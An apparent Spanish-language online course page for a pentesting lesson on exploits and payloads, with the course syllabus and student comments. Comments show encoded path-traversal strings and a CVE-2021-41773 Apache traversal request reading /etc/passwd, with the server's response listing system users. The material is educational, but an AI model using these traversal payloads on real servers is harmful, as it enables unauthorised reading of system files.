Introducción al Pentesting
Bienvenida y presentación del curso
Habilidades necesarias
CVE, Microsoft Vuln Database
Enumeración de vulnerabilidades comunes
Enumeración y clasificación de patrones de ataque comunes
Sistema de puntuación de vulnerabilidades comunes
Seguridad por oscuridad
Ciclo de vida del Pentesting
Obtención de Inteligencia
Análisis de Vulnerabilidades
Técnicas de ataque y explotación de vulnerabilidades
Post-explotación
Desarrollo de informes
Introducción a los exploits
Vulnerabilidades de tipo 0-day
¿Qué son los exploits y los payloads?
Bases de datos de exploits
Tipos de exploits
Técnicas de ataque misceláneos
Ataques de fuerza bruta
Ataques de denegación de servicio
Spoofing
Fuzzing
Técnicas de ataques físicos
Instalación de Kali Linux en Vmware
Aún no tienes acceso a esta clase
Crea una cuenta y continúa viendo este curso
Aportes 8
Preguntas 0
Qué son los exploits y los payloads?
Exploit:
Hace referencia a los pasos a seguir o el método que se refiere para explotar una vulnerabilidad. También se hace referencia al scripts, código o programa que explota la vulnerabilidad de manera automática.
Payload:
se encarga de ejecutar una acción dentro del sistema explotado. Puede ser el comando para ejecutar una acción donde puede establecer una conexión entre el atacante y el sistema infectado y poder controlarlo.
.%%25%33%32%25%36%35/ decodificado da: .%%32%65/
.%%32%65/ decodificado da: .%2e/
.%2e/ decodificado da: …/ (subir nivel)
con ese trucazo de los …/ encodeados ya tengo arto por probar jeje
Para que no les pase lo mismo que a mi: Asegúrense de dar clic en “Decode” en la parte superior de la página. Por default está en “Encode” y obvio no arroja los resultados esperados.
2:18 En esta parte el profesor quizo decir “El Payload” no el “Exploit”, aunque luego lo clarifica.
…/ 😃
Vulnerabilidad CVE-2021-41773
El objetivo es la carpeta etc y el archivo password.
El exploit es: /cgi-bin/ /.%2e/%2e%2e/%2e%2e/%2e%2e
El payload es: /etc/passwd
El resultado en el sistema Linux: todos los usuarios
HTTP/1.1 200 OK DATE: Tue, 05 Oct 2021 14:51:37 GMT Server: Apache/2.4.49 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Fri, 18 Jun 2021 09:31:30 GMT ETag: “820-5c506fd229535” Accept-Ranges: bytes Content-Length: 2080 Vary: User-Agent Connection: close root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12👨/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System
¿Quieres ver más aportes, preguntas y respuestas de la comunidad? Crea una cuenta o inicia sesión.